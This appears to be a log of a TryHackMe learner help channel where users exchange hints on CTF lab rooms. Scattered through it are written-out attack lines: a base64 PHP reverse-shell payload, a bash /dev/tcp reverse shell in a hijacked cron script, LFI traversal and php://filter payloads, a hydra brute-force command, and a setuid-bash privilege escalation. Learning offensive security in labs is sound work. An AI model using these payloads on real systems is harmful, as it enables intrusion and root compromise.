So it's solved now, yes?

Nooo... I'm going the route with the text this time to see if anything changes...

Okay, ye then give that a try, otherwise write in here again.

Got it - yay. I was just very confused. Thanks!

Room --> Password Attacks

Task4 Q2 --> "What is the crunch command to generate a list containing THM@! and output to a filed named tryhackme.txt?"

This is so frustrating. I must be losing my dang mind. I know for a fact that I have the right answer. I even tested it and it worked....It's still saying my answer is incorrect. smh

can anyone help? please? I must be messing up the next 2 digits after "THM"

feel free to DM

nvm. just got it......few.

hello guys, I am working on cc: pen testing [section 2] gobuster and no matter what i try i can not get gobuster to work i have tried to bring up the man/ --help page but neither commands work. i am working on the kali attack box

Send your full command

i tried man gobuster and gobuster --help and neither work.

If you are talking about the web based attack machines provided by thm, you rather want to use the attackbox then the kali linux machine.

oh ok

i have always used the kali linux i will try it on there thank you

Ye, I belive the kali linux machine is not maintained/updated anymore, so therefore going with the attackbox is recommended.

ahh better already i appreciate the help you guys rock!

Hey all! - while waiting for AoC3 daily i'm doing AoC2 for the fun of it. I'm doing Day2 which includes a php reverse-shell but it doesnt connect back to my "nc" when i try to open the file i uploaded (i uploaded the revshell as a .png file) - any tips are appriciated

nevermind! - i got it!

hey guys and dolls, i;m having issues with the 'upload vulns' room

meaning ..after i make the changes to the hosts with the echo..i can't access the various URLS..java.uploadvulns.thm , etc

i'm literally cutting and pasting the directions..as well as tried restoring it, then trying again.

Show the output of cat /etc/hosts pls

127.0.0.1 localhost
127.0.1.1 kali

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.93.14 overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm

Are you able to open 10.10.10.10 in your machines browser?

yes

im vpn'd

Can I try to access that target machine?

i actually went back to this challenge because it didn't work...then i got it working last week..now it won't work again

10.10.93.143

i realize that hosts was missing 143..i changed it and it still won't work

Could you answer my last question ?

you want to access the machine?

Yes, your target machine, to see if it's working for me.

10.10.93.143

thats the IP

Okay, seems to work fine for me.

What's the url you enter in your browser bar and what's the reply to it?

its now working for me too

super weird

Well, sometimes give the target machine a couple of minutes to fully boot and obviously make sure to have no typo in the IP 🙂

great ! thanks for your help and patience

https://tenor.com/view/bye-bye-love-บาย-au-revoir-บ๊ายบาย-gif-24085538

Common format for CVE's is CVE-####-#### ?

I want to make sure i'm submitting the wrong CVE to the question vs. the wrong format.

Yep, more searching on google has confirmed...

Hi all. I'm going through https://tryhackme.com/room/blue, but I'm confused with the first question. I'm looking for the vulnerability, but the list of MS-xxx exploits is suuuuper long, and doesn't have a reasonable search. I'm thinking I'm missing something obvious.

Can somebody give me a hint?

The question I mean is "What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)"

The way I see it, is I have the list of ports, and that's the information I should use to find the right MS vuln. But on the other hand, there are probably way too much of those.

You could run the nmap scan on the open ports you found with -sC -sV which might be able to suggest you some vulns.

oh

That explains it. Perhaps I should do the nmap room first ?

Yes

(I just started THM. Did the advent, and the pre-security path.)

Do the nmap room and the metasploit room before doing Blue

Gotcha, will do that.

I'd suggest the Complete Beginner Path next :)

Well beside that I don't think you need nmap anymore after that question, but for sure a good thing to check out nmap if you unfamiliar with it.

I skipped that because I'm not an absolute beginner in terms of computers/programming. Maye I shouldn't have.

Thanks all! Loving it so far 🙂

Don't assume ;)

"Assumption is the mother of all fuckups" and all that 😂

Pre-security is an introduction to basic concepts needed before beginning to learn about cyber security

The Complete Beginner path is the one that starts going through security stuff

thanks, I will give that a shot.

Tbh the names confused me at the start but I started with the Complete Beginner one since I didn't want to miss anything out

Hi. In the burp suite room task 10 question 2 it asks me to look for a response with the 'set cookie' header

I'm having a really hard time finding it

I feel like the part that's confusing me is that I have multiple /socket.io and all of them have the set Cookie header

Would sending any one of them work?

I went ahead and used every one until one of them gave me a graph

I'd still like a hint though 😄

Hello:) I am doing further nmap room, ran into issue. Nmap -sx is telling host is down when it should show 999 open/filtered ports

try pinging the host first if it is actually up

Ping does not work. However it should be blocked by firewall

Ping works to other hosts

that probably means you cant access the host

Nmap task 14

if you are confident that the host is up, use -Pn

I’m not confident host is up. It should be up though, I have terminated the instance and deploying a new one.

maybe you are not properly connected to the vpn

Already regenerated and redownlaoded config file

And connected with openvpn. Looks fine on that front

What else can I do if host is not up?

can you show the command you run and the complete output?

!docs verify

-pn shows host is up!

but cant get -sx to work

even though it should to get the right answer for the task

Isn't that a different IP?

im dumb

thank you

lol

its the ip from the old instance

oh no this is intersting

the ip from the old instance started working

i guess i didnt wait long enough for the machine to deploy.... even though i waited over 15 min

Could be. What are you trying to solve here?

not matching to the correct answer

Try adding -Pn to your second command.

i did that in the previous command. it worked.

host is up when i use -pn

but host is down when i use -sx

Add, not instead.

oh i see

-Pn and -sWHATEVER are doing different things.

so is nmap always going to tell me host is up with -Pn even when its not?

@signal sapphire Oh, and please ping or reply if you expect a response in a conversation. Not everyone is following every day every minute every channel 😉

@signal sapphire No. -Pn is not a lier, man. Do you know what -Pn does?

treats all hosts as up

Not exactly accurate. Just google it.

Will do. Thanks for the assistance

Gave +1 Rep to @versed shadow

Hi ! I'm having an issue with the cyborg room, when trying to run the script (that is allowed to be ran as sudo) the ssh connection just crashes

Any idea ?

Never mind, I got it to work spawning a reverse shell within the ssh connection --'

Edit: Solved (I was dumb and confused two windows I had open. The command works just fine, I just am too tired I guess)

Room: Game Zone (https://tryhackme.com/room/gamezone)
Task: 5 (Exposing services with reverse SSH tunnels)

I am trying to create a ssh tunnel so that my local port 10000 maps to the remote localhost:10000. I am using the following command:

ssh -L 10000:localhost:10000 agent47@<ip here>

This is logging me in to that machine (after providing the password), but it does not seem to forward the port correctly. Any hints?
(<ip here> is of course replaced with the actual IP)

command output for reference

hey, guys! I am currently doing the "Lazy Admin" room. Found the backup file, but not sure how I could find the login page. Tried looking at the documentation but didn't really find it. Could you give me a nudge in the right direction, please?

nvm, gobuster is da man!

Hey, I'm doing Linux fundamentals 1 right now, the question is "Which directory contains a file? " There are a lot of directories which have files, so how can I know which one is the right answer?

what directory are you in rn

/root

remember that cd is to go into one and cd .. is to go out

cd home

cd user or whatever the name is

then do all the stuff

idk

Yes I know

There are files in the Picture folder, in the scripts folder etc..

so whats your problem on a more descriptive scale?

But all of them were wrong answers

send me a screen shot of your terminal

I can send screenshots, don't know why

can't*

you have to verify

!docs verify

Uf..

look in /home/tryhackme/

and make sure you cd into each directory @hushed karma

there should be 4 "folders"

are you on the linux machine or the parrot os attack box?

I just started the machine which they wanted me to start

But yes it looks more like Parrot

on the bottom area where you can add time to the parrot os and such, is there a linux fundementals tab

click the linuxfunde------ on the bottom of the right

should look like this

I see.

Thank you

np

.

did any one solve log4j room

Hey there, I need some hint for the log4j room ...
I barely know it will be some stupid thing but I don't find the "field" name in the log ... 🦆

room: https://tryhackme.com/room/ohsint
where do I search for password?

do you still need a hint?

Yep ! I didn't retried since yesterday 🙂 !

Due to this

I'm assuming you've done the question before this one?

did you try googling the email?

Yup ! I will not spoil but I could say it's about cores 🙂

correct, both of these answers are on the same line inside the log file.

Ok !

I was totally dump x)

That's done now

Thanks for helping your dump colleague lad

haha

I'm done with https://tryhackme.com/room/networkservices, but I missed a single question, and don't know what I'm supposed to answer.

They ask me what the variant of the ftp server is, and I tried both possible answers, but none of them are correct? :/

You should be able to get that answer with a nmap version scan

Argh, I should have known that. Thanks!

Congratulations

You've completed the room! 😄

@gusty silo if you do whoami and it prints root that is because you are root

i cant figure out whats wrong, someone said to check the parameters and im still lost. sorry im really new

its the same exact command other than the ip as the tutorial video

lol type curl --help all and tell me what -x flag is

Please can I get some assistance

linux is case sensetive.... windows is not...

ask your question and your chance of getting help increases 10x

I'm doing agentsudoctf. It wants to know the CVE for the privesc.
I already have escalated privileges with ||an lxd container, https://www.exploit-db.com/exploits/46978|| however it doesn't list a CVE. I tried looking for other exploits, but I couldn't find anything.

then you found another exploit then the intended one... the intended exploit exploits the sudo binary

mhh

you asked in hints so you only get hint and not the full answer

I'll be looking. searchsploit doesn't find anything for the specific version. les suggested the heap buffer overflow. that's not it either, but i'm gonna try it anyway :3

nope it is not a buffer overflow

it is something you can detect by the sudo -l command

well

worked anyway.

2 root exploits. neither one is the answer

Did you try to search for it on exploit-db for example?

searchsploit is exploit-db

only local. and faster, because no browser

gonna have another go. at it :/

Ah alright.

searching exploit-db for sudo gives quite a few results and one that is relevant but yeah it nice to have searchsploit available

||(ALL, !root) /bin/bash|| doesn't seem all that useful. the user isn't in any group that other accounts are not in. and the only one in the sudo group.

it can run it as not root....

so what does that mean???

it means i can run it as any user but root?

exactly

including none valid users

||https://www.whitesourcesoftware.com/resources/blog/new-vulnerability-in-sudo-cve-2019-14287/||

yay

thank you~

yay you found it.... good job falco

thank you. i hated it

so this means if you run it with the correct invalid user it gets run as root

i only found it beause i googled the line from sudo -l

yeah that is one good way to find it

no it isn't

i only googled that because you told me it has to do with sudo -l's output

oh haha

i saw it and thought: k, no sudo bash then.

well now you are most likely not forgetting this priv esc vector

i found 2 others xD

yeah which is impressive and a nice good job for you

i think the sudo heap buffer overflow broke most rooms to be honest

it's very recent

anyhow, thanks

dinner time!

enjoy your dinner

🦊🍖

@deft siren thats how i foudn it, just googled that (ALL !root) thing and found the exploit code

usually the 1st thing i do on a box is sudo -l, saw that !root and googled what that was and what it meant and that led me to the CVE

@deft siren and unless you manually update your searchsploit (with -u) then it might not be as current as exploit-db.

here is the exploit in question on exploit-db: ||https://www.exploit-db.com/exploits/47502||

i update searchsploit every time before i do a ctf

hallo can I have some help with investigating windows. trying to what IP addr Windows Server connects to when it first boots up ?

have tried filtering a few logs by event ID. can't seem to find the right one

Does anyone uses burp suit here

i prefer ZAP. no limitations and open source. it does mostly the same thing, too.

Most of the people do

The pro version?

@gusty hornet Can I DM you? about Rocket room.

@rustic vigil sure

Of particular interest - we notice the container containers a tool called envconsul that is pulled from Github

is that even english?

adventofcyber3

hi all, I'm in Overpass 2 - Hacked and asking for some help on the question, "What's the hardcoded salt for the backdoor?" under Task 2. I have the code pulled up in github, and see the function calling the salt, verifypass and hashpass, but don't see the value for salt. Can someone point me in the right direction.

what's the github repo url?

https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go

func verifyPass(hash, salt, password string) bool is defined in line 55

find out what calls this function and the arguments for it

the second argument is the salt~

@fleet swan search that page for where the verifyPass function is being called

hint: ||ctrl + f||

then just look at what arguments the function is using and compare that to the function defintion to see which one is the salt

the salt is not starting with foxesareawesome. this program is trash.

LOL

thanks, found it, by looking where that functionw as called

🦊🇮 🇸❤️

amen brother

Got another one for yo

The last question in that room/task says, "
Crack the hash using rockyou and a cracking tool of your choice. What's the password?"

Which hash, the default or the one used? I'll try both, but to save time figured I'd ask.

running hydra on a login that redirects on failure, is this correct syntax?

ydra -l jack -P /usr/share/seclists/Passwords/rockyou.txt 10.10.3.144 -s 8888 http-form-post "/login/:user=jack&pass=^PASS^:Invalid" -V

looks like it yes

except for the missing h in your instance of hydra

no dice, intruder finds it in like 10 seconds

found this S=Location: /redirect location but hydra falls over on the : after Location

It's probably your condition that's failing you

@umbral umbra the :Inavlid part?

i tried Error: Invalid username or password i think was the text...that fails on the : after Error

90% of the time, when hydra is failing for me, but another tool works, it's the pattern i'm using

tried looking for success message, fail message, wasted some 2 hours trying to figuyre out how to get it to look at the redirect page since success redirects to /logged and failure redirects to /error but couldnt gain any traction

i mean the challenge specifies using burp 😛 i just wanted to do the same thing in hydra

meh, gave up on and continued the room

found a couple sites that had like hdyra -l blah -p blah 10.10.10.10 http-post-form "/login:user=blah&pass=^PASS^:S=Location: /logged" or F=Location: /error but i couldnt get that to work at all

Maybe you already fixed that, but in case you didn't, I think it's not http-form-post rather then http-post-form

@left thunder yarb my typing from memory isnt so good 😛

Any hint where the ZIP is stored? I managed to proceed and got the user flag without cracking it, therefore I am not sure about this file.
https://tryhackme.com/room/agentsudoctf

Try a different tool to locate hidden stuff.

I saw the hint about John. But my only exploit is the FTP server for that user and I can't even locate the file to crack it. Seems a bit strange because I answered the upcoming tasks and got the user flag without it... Am I off???

So did you try any tools to locate hidden stuff somewhere ?

Specifically, hidden stuff in files 🙂

I cracked the image and got the password from it.

I don't remember everything in detail of that room, but which tools you used on that image?

steghide and stegseek @left thunder

And you used that on the other images as well?

the other image is a png and stegseek only works with jpg @left thunder

Ah okay, ye well then I can just come back to the first hint, try a different tool on these other images to find hidden files. 🙂

So I found out with 7z that there is indeed a file hidden in the png file and I ran John on it with rockyou.txt - but it isn't cracking it. Haven't really used John before, might be doing something wrong now.

You have to extract the file first.

When I tried to run 7z x cutie.png it asked me for a password!? I am not clear what you mean by extract

Using a certain tool to extract the file that's in the cutie.png. Maybe that helps you: https://ctfs.github.io/resources/topics/steganography/file-in-image/README.html

Figured it out. Room done :) Thanks!

Gave +1 Rep to @left thunder

Room Overpass - asking for a hint on how to move on from /admin

Oh, wait, you're not on the box

What do you have right now?

Empty-handed. A hint that it's an OWASP10. What I've learned till now is only if I can create a user, then I can somehow play with the cookie.

I don't think there's username creation as a feature, is there?

No, there isn't.

That's why I don't know why direction to take...

The source-code shows that the creds are being processed by a login.js - not more than that...

By a what now?

Oh

You looked through that?

Not really. There is also a cookie.js

They'll be processed on the server. Login.js is just the javascript that does the client side parts of that.

I think I am not ready for this box. Simple. I don't know what to do with these .js files. Can you perhaps tell me where and what to look up to learn more?

I don't know what to do with these .js files. Read the login one

Think what could go wrong with the authentication

It's set up that if the cookie === Invalid, then you can't log in. If else, you can. I think it should be the opposite. If cookie === valid, login, anything else, not.

Try things then. Test your theories.

See what happens, and learn from ti

Thanks, for now. @stuck fractal

Gave +1 Rep to @stuck fractal

Question on Overpass2, task2, question "Crack the hash using rockyou and a cracking tool of your choice. What's the password?" I was able to get the PW cracked with hashcat on Windows, but, is it possible to run hashcat in Kali VM? I get an illegal instruction error.

I've done some research, but no luck, thought someone may have fixed this before.

DO NOT use --force

--force leads to false positives and false negatives

Also, wondering why I can't get it cracked using john.

Run hashcat on your host or swap to John the Ripper

I have a different hash format down

for the salt and pass or the alg altogether?

I think it's just how you're specifying it in the text file

I'd try a colon?

Oh, man. I got in. Just had to create a cookie. Btw, I did it in DevTools in Firefox.

There's something weird with dynamic formats in JTR

try --format='dynamic=sha512($p.$s)'

I read some of the walkthroughs seeing if anyone got it in john and seems like they all used hashcat. I was hoping to get it done in john for the extra bit of knowledge.

I updated my message

I read some stuff last night using this same format and tried some of those formats as well, but was getting these similar message.

Swap back to a dollar?

Some of the writeups use JTR, and John Hammond got it working after talking to me a bit but I've lost that conversation

https://github.com/openwall/john/issues/2125

Please don't spoil the password though

Thanks for the help and the link too!

Seems like hashcat likes the : and john, depending on the format can use either.

For the future, set up hashcat on your host. Super easy on Windows or Linux.

If you have a GPU, it will be a million times faster

Thanks, yea I ran it on hashcat this morning and it took 3 seconds with rockyou! That was after updating the CUDA package, I ran it last night on CLI and it took 1.5 hours!

Gave +1 Rep to @stuck fractal

Also, seems like --format=dynamic_82 works with $ in the hash file

Room Overpass

Asking for help on how to run ssh2john

Solved. Downloaded .py from Github.

i need help with dogcat

i figured that you can pass something into the view query string parameter and that it's filtered for the string "cat" or "dog". and that the user input is then passed to include with .php appended to it.
given that I tried a revere shell php script in base64 that can end in .php and starts with cat. but data:// is disabled.
php:// is allowed but i can't think of anything that contains cat or dog and ends with php that could be useful.
what shall I do?

what error does it throw when you try to get anything except cat or dog?

what do you mean except a cat or dog?

when i try something that doesn't contain cat or dog it just spits out a string "only cats or dogs allowed"

otherwise it will give php errors about include not finding files or wrappers being disabled or malformed

try to keep the word dog or cat in the string while performing the lfi

yes

i tried this base64 string

cataCjw/cGhwIGV4ZWMoIi9iaW4vYmFzaCAtYyAnYmFzaCAtaSA+L2Rldi90Y3AvMTAuOS45Ljc2LzQ0NDQgMD4mMSciKTsgPz4.php

but data:// is not allowed

so i can't execute that

well in that case , keep the word dog or cat in the string and traverse back to try accessing local files

well the issue with that is

there aren't many useful files with the filename containing cat and ending in .php

something like ?randomparam=dog../../index

wait shit... you're right

there is a cats directory...

I could cats/../../../../etc/passwd

exactly

but then again, passwd isn't passwd.php

but i could dump the source code for the page with the php:// wrapper at least

if it were in .php the browser would execute the file and no results will be displayed

you can try that

i tried

10.10.135.187/?view=php://filter/read=convert.base64-encode/resource=cats/../index.php

and got

Warning: include(php://filter/read=convert.base64-encode/resource=cats/../index.php.php): failed to open stream: operation failed in /var/www/html/index.php on line 24

Warning: include(): Failed opening 'php://filter/read=convert.base64-encode/resource=cats/../index.php.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 24

what did I do wrong?

see the respone , it added an extra .php

right... silly me :/

request with only index

i already discussed that xD

xd

brain is mush by now

:))

that worked. now I can read arbitrary files as www-data. I guess.

Yeah

Room: Overpass (1)
To get root, have edited /etc/hosts to my tun0 IP and launched a http.server and added a file in the corresponding directory with a nc reverse shell. Unfortunately, not getting any response. Can someone kindly help troubleshoot this?

hrm...looking at the files i have for that room. did you find anything called buildscript.sh?

oh man i should have saved the password for james key lol need to crack it again

i resolve to take better notes starting today

thanks to you I ran pspy64 and found a cron job curling from overpass.thm/downloads/src/buildscript.sh and bashing it. So I changed the /etc/hosts file so overpass.thm should point to my tun0 IP. Launched a python server on my end and created the directories and created a file called buildscript.sh with a reverse shell bash script in it. Set up nc but no response.

Gave +1 Rep to @forest robin

i used a bash reverse shell

Should I DM you the passwd?

naw, good practice for me 🙂

and you are hosting the buildscript.sh in like downloads/src/

that got me for awhile, i didnt have the file in the correct path

yes, and the python server is running on the dir under /download

/downloads

or above, better said

hrm...i did this, created a www folder, then in that folder i have download/src/whatever

and hosted from www

has to be called www?!

and your doing the same

no..i just do that out of habit

ok. perhaps my .sh script isn't good

What did you put in it?

#chmod -R 777 /root/
bash -i >& /dev/tcp/10.20.30.40/4444 0>&1

obviously change the ip and port

Can you explain to me the first line?

that chmod? junk, i was testing ALOT of stuff, jut forgot to remove that

i was trying the easy solution lol, since the buildscript was running as root with that cron, i figured i would just make /root world readable and just go grab the flag, didnt work 😛

@forest robin I am not really getting every part of the bash shell syntax for now... trying it out anyways

https://explainshell.com/

that site will do its best to break down the command and tell you what each part is doing

@white salmon in /etc/hosts did you add your ip, or did you replace what was already there?

cron is doing curl against a domain name, make sure in /etc/hosts that domain name is referencing your ip

and just to make sure maybe from the user try running that same curl command to see if you get a shell

I replaced. I added the port of the python server - right? Like overpass.thm <tab> 10.20.30.40:8888

oh...i did sudo python3 -m http.server so it ran on 80

not sure /etc/hosts can handle ports

and thats backwards i think it should be ip <tab> domain

So let me try that now...

Bad memory..

no worries, yeah try just the ip and do sudo so it runs on 80, then just to make sure its all working run that curl command as james and make sure you get a shell, no point waiting around for that cron if you got a typo somewhere

it runs by default on 8000.

with sudo it should run on 80

tried forcing it to run on 80 and says address already in use

you can specify port like sudo python -m http.server 80

sudo ss -tlnp

and check whats listenign on 80

a bunch of httpd

httpd sounds like apache, you got a web server running?

Oh, man, yes, in that VM I installed once Apache

omg

😛

in that case you dont need python http.server

just go to the /var/www/html or whatever your document root is...or just kill apache

systemctl stop httpd should do it (systemctl disable http so it doesnt start automagially)

Moment of truth...

Yo!

+rep @forest robin

Gave +1 Rep to @forest robin

awesome!

So I guess I just learned that /etc/hosts can handle ports...

The second room today without a walkthrough... getting somewhere there.

on a roll, keep it going!

took me a long time just to install all the steganography tools today. and then john wasn't running. a lot of technical problems today.

no kali vm?

ehm, no. Arch VM.

the last 2 days of AoC challenge involved aws and docker. i used the attackbox for those only because i didnt want to spend time installing and most likely troubleshooting stuff

there is the blackarch repo you can add to arch, blackarch being the arch version of kali basically

dunno if that would help you? https://blackarch.org/

arch eh? elite 🙂

I've heard about it. On the other hand I enjoy trouble shooting the technical stuff

No, just very light on my laptop. My host OS is Arch, so I am used to it more than other distros

gotcha

@forest robin have you done overpass2?

not yet

was gifted a sub a few days ago and been focusing on finishing up these paths since i can do them now

can you crack shadow withOUT passwd?

about to start this: https://tryhackme.com/room/uploadvulns

hrm...afaik you have to unshadow the shadow file to make it crackable in john or hashcat, and you need info from both /etc/shadow and /etc/passwd to do it

like copy the root line from /etc/shadow into shadow.txt and copy the root line from /etc/passwd into passwd.txt
then unshadow shadow.txt passwd.txt > unshadow.txt

then crack unshadow.txt

afaik i could be totally wrong

hm. thought so, too. a weird task, so. missing something again, ough

so I've cracked the hash in shadow with John without the passwd file. Don't really get it. Why do you need to unshadow it?!

oh really? idk i did a room the other day where i had to unshadow it, thought you had to always

ok. waiting for you to do overpass2 :)

lol, was hoping you would finish it then help me out 🙂

has some cool wireshark stuff to it, also :)

ahh nice, yeah doing this file uploads vuln room atm

me finishing a room? it's gonna take me ages... googling around every single thing

then will probably do the last 2 parts to this web fundamentals path before going back to random ctf rooms

https://tryhackme.com/jr/avengers and https://tryhackme.com/jr/toolsrus

@white salmon keep poking and googling

Hello, everyone! I am currently working on the Mr Robot room (which is so damn awesome!), and after getting the first key, I am not sure how to proceed. I'd appreciate a nudge in the right direction

enumerate more

Room: IDE
Can someone give me a hint on how to get a foothold on port ||62337||? Have tried ||CVE-2019-19208|| but can't get a shell with the .py-script.

@shy pagoda did you gobuster?

@white salmon just starting this, you did find the stuff in the ftp right?

@white salmon trying to get one of these exploits to work has been a battle, haven't rooted it yet but i can point you towards the wall im stuck at 😛

wazzup THM?

I am a noob on Walk an Application. I am on Lesson 3, where you need to view the source code with the web page provided. I think the link they provide is out of date. The comments show that it's being redesigned.

help a brutha out?

I run through it and it work perfectly be more specific

remember ur viewing the source for both the framework on the html dir

damn, looks like I exceeded my 1 hr/day limit on my sandbox. double damn.

I didn't realize you need to sub.

I will have to try tomorrow. @quaint prawn thx for the assist. I'll try tomorrow.

Gave +1 Rep to @quaint prawn

Np

redteamrecon
having issues adding a key for censys_email_address
[!] 'censysio_id' key not set. censysio module will likely fail at runtime. See 'keys add'.

[recon-ng][thmredteam.com] > keys add
Adds/Updates a third party resource credential

Usage: keys add <name> <value>

[recon-ng][thmredteam.com] > keys add this 1
[*] Key 'this' added.

lol

I'm sure there's more to it but don't yet know what

Frankly, missed it the first time. Once I got stuck I went back to it and found it. Used BS Intruder with a common passwords list to get to the password.

I am still trying to get one of the exploits to run. All I get are error messages from Python
: ) Got the shell after several attempts.

||CVE 2018-14009 ||worked for me

hi, can I get advice on CC: Pentesting room? doing section 6 smbmap and I am not sure, how to finish last question in task 20. It kinda doesnt even fit ? any tips please

well found the answer here

@plucky thunder you basically just gotta combine a few flags and form the command

i know but i didnt use "" so it didnt match =]

haha

What is the CVE for the 2020 Cross-Site Scripting (XSS) vulnerability found in WPForms?

I used searchsploit, got the cve number but it still didnt work

any idea?

@forest robin rooted IDE? My reverse shell as root keeps falling once connected

yes, thank you! I got a little further now, shame I actually had to watch hackersploit do some parts. But hey, I've learned new stuff. I am saying shame I had to watch hackersploit in the sense "shame I couldn't get this far on my own"

Gave +1 Rep to @forest robin

Room IDE:
I got user.txt - Am I on the right path with manipulating the ||vsftpd.service|| file???

@white salmon yes you are, i only got the ftp right away because that folder stood out and i was like "what the? where does this go?"

for the Mr Robot room, key3/root privesc....any hints?

is "Dirty cow" the right path also?

Search for SUID binaries, one will be very interesting to exploit

the hint will tell you which if you don't see it

@shy pagoda ( I've disabled the ping so in case you didn't see )

I tried changing the ExecStart line of it to run a bash shell.

thank you, not sure what you mean about disabling the ping tho

Gave +1 Rep to @prisma glade

@white salmon ||i changed that ExecStart to chmod +s /bin/bash||

Np, like when I reply to you you don't get any ping

simple as that :p

@white salmon ||to make bash suid, then after restarting the service, i ran /bin/bash -p||

Let me try this soon. Did you try to exploit SUDO?

||and chmod needs full path so it should be like ExecStart=/bin/chmod +s /bin/bash||

sudo itself? no, only this sudo restart service thing

you know why right?

there are some CVEs about that SUDO version

ahh right like baron samedit i think?

and nevermind on the why thing, i was thinking of a different room that used $PATH as an exploit

I don't remember the name. It's not that -1 thing. Something else, I got a headache googling around so much today

getting the exploit to work was my hardest problem, tried all 4 of the RCE ones they listed, even that .txt one that just says to navigate to some folder and right click upload, wasted like 30 minutes trying to find that folder

i know there is a sudo vuln involving sudoedit that is actually somewhat new so most of these THM boxes are vulnerable to it

I am not sure yet what he is talking about. I could not get further than /image if I remember right. I used the one with the 2 nc

yeah same

that one i smashed my face for awhile until i realized the port and id were MY port and id lol

like why am i putting the target http url AND putting the target ip and port...smh

Haha. Same here! And then it doesn't always work. For any reason...

that /image clue had me running around on nothing lol, still not sure if that was a red herring or an actual clue? i grabbed all the images on the site, and tried to run stegcracker on them, i had got the shell before the 1st stegcracker was finished

not the /image clue, but the "take care of the image file"

i thought something was stegonagraphy in an image...

🤦‍♂️ I was busy with SUDO most of the time. And I did not get far. And I still want to try to get it done with SUDO

this one https://github.com/CyberCommands/exploit-sudoedit

i was gonna try that if i couldnt get the service thing to work

but hard-headeness made me keep trying on the service thing till that worked

did you get that error "must be run from terminal"?

was wondering about that for a while

then i read about cidiad, wanted to understand why the other exploits didnt work. lol didnt get very far with that 😛

what's causing this error?

no? did you upgrade your shell with that whole pytong import pty stty raw echo stuff?

yes, that solved it. pty.spawn. But what's the error? Still trying to understand this

netcat is not a terminal so many commands wont work correctly, like i if you do man <anything> in a netcat session it wont work, terminals have more features than just a bare netcat session

there is a room that explains better than i am

https://tryhackme.com/room/introtoshells

thats a good one

so you are a sudo master now huh 😛

Putting it on the list :)

haha.

I just realized how much I don't know

i guess think of it like this: netcat is like us holding some thread and a tin can to communicate, we can do so, but its not very robust, if we use a telephone we can communicate more effectively and a cell phone even more so

netcat is like the thread, upgrading the shell is like the phone line, then socat would be like using your cell phone (which you can use to transmit more than just voice)

Something was also confusing me, if you have writing permission on a file, why can't you delete it?

Couldn't replace the service file.

Just cat > to it

i think its because the user didnt have write permission on the folder?

interesting that to erase a file you need permission on a folder. I am still trying to grasp all this.

well to erase a file you are writing to the disk

to release the file handlers or whateve

i think?

initally, I haven't noticed the hint. Now I was pretty sure that I am on the right path spoiler alert: I was going for pt_chown lol, but the hint showed me once more how wrong I am :D. I am currently working on it, thank you!

Gave +1 Rep to @prisma glade

and replacing its content? you are not writing to the disk?

@shy pagoda the Mr. Robot room? did you play around in that 'shell'

@forest robin you are also changing its seize?!?!

so I wgetted it and cat > on the original one...

@white salmon yeah, so the folder write permission controls if you can write / delete files inside it, the specific write permission just decides if you can write

is that correct lol?

Man, this is so fascinating. I really like this room.

didnt use the -O flag with wget?

output file

didn't know about that :)

Not sure what you mean by this, man

i just used nano on the file (lol actually kept notes on this room)

very basic notes though, just want commands i ran

@shy pagoda when you go to web server for that room there is a 'shell' you can interact with if i rememember

nano? Does this machine have nano? tried my luck with vim and everything was messed up

Hi guys.
I´m doing the "John th Ripper" room at the moment. Does someone know if rar2john isn´t in john anymore?

nano is pretty standard

Does the victim machine have nano? I have to try this out. I think I tried before...

Aye this is no big deal, try things until you get the right one 😄

it happens to everyone

oh, I got ya now. I'm past that now

😄 thanks

Gave +1 Rep to @prisma glade

I try to keep notes. Especially all the essential stuff, since not once I pressed CTRL C by mistake and had to redo everything ://

@plucky pecan its not in /usr/share/john like the ssh2john and others

rar2john appears to just a command in kali

btw found out that adding & at the end of nc command puts it in the background

type rar2<tab>

that doesnt do anything unfortunately :/

on kali?

or you install john yourself

john is installed

i´m using the attackbox

i even installed it myself again

welcome !

oh idk, if you installed yourself, make sure you installed the jumbo versionof john

some distros default to the smaller john and that is missing quite a few things

the attackbox should have it though?

@white salmon yeah my notes are just: got the root flag, ok lets scroll back through all 200 terminal windows and figure out where we started, and which commands yielded results, put those commands in a file in order 😛

mine doesn´t it seems 😄 I tought it had jumbojohn tho

john -h will tell you which one you have on the 1st line

John the Ripper 1.9.0-jumbo-1+bleeding-aec1328d6c 2021-11-02 10:45:52 +0100 OMP [linux-gnu 64-bit x86_64 AVX512BW AC

i would imagine kali has jumbo john...i installed the kali-linux-everything so my installs may be different

i have : John the Ripper 1.9.0-jumbo-1+bleeding-51f7f3dcd 2020-09-01 13:29:43 +0200 OMP [linux-gnu 64-bit x86_64 AVX2 AC]

so you have john...and typing rar2<tab> didnt complete to rar2john?

which rar2john shows nothing? (should have had you do this one 1st)

when i type "rar2<tab>" nothing happens

when i execute somehting like "rar2john secure.rar > rar_hash.txt" i get "rar2john: command not found"

ssh2john seems to be missing aswell

ssh2john is not a command it is a script located in /usr/share/john

//usr/share/john/ssh2john.py

but rar2john is a command located in /usr/sbin/rar2john

did you try: which rar2john? if that comes up blank you are missing that

yeah it stays blank

I ran that with python ssh2john.py is that right or do i have to put the location aswell?

@plucky pecan so you dont have rar2john installed then, maybe your system is out of date? or...idk. and for ssh2john.py you will need full path

python3 /usr/share/john/ssh2john.py ssh.key > ssh.key_hash

something like that

but shouldn´t the attackbox be as up to date so you can do the rooms as they are discribed?
How do i install the correct version then, since apt-get install john didnt get me what i needed (not sure if this installs jumbo john for sure).

@plucky pecan apt search john and do the one that has jumbo in its name? if nothing comes up might have to install from sources?

and attackbox should be up to date as its supposed to be a generic kali machine for people without local kali to use, dunno how often they update the image

Ok i will tinker around a bit with it tomorrow and see if i get it solved. Thanks for your help so far 🙂
I´m calling it a day now

@forest robin What am I doing wrong? 🤯

@forest robin @white salmon thank you both so much! You have no idea how fun this room was for me

Gave +1 Rep to @forest robin

Gratz 😄

@shy pagoda grats!

@white salmon correct path to chmod?

@white salmon remember paths on the target might be different than paths on your local machine

🤦‍♂️

||i used /bin/chmod||

whereis revealed the truth... OUGH

whereis? never knew that one before

Am I used to have it in /usr/bin

which and locate yeah...handy, thanks @white salmon

Gave +1 Rep to @versed shadow

100% right.. 🤕

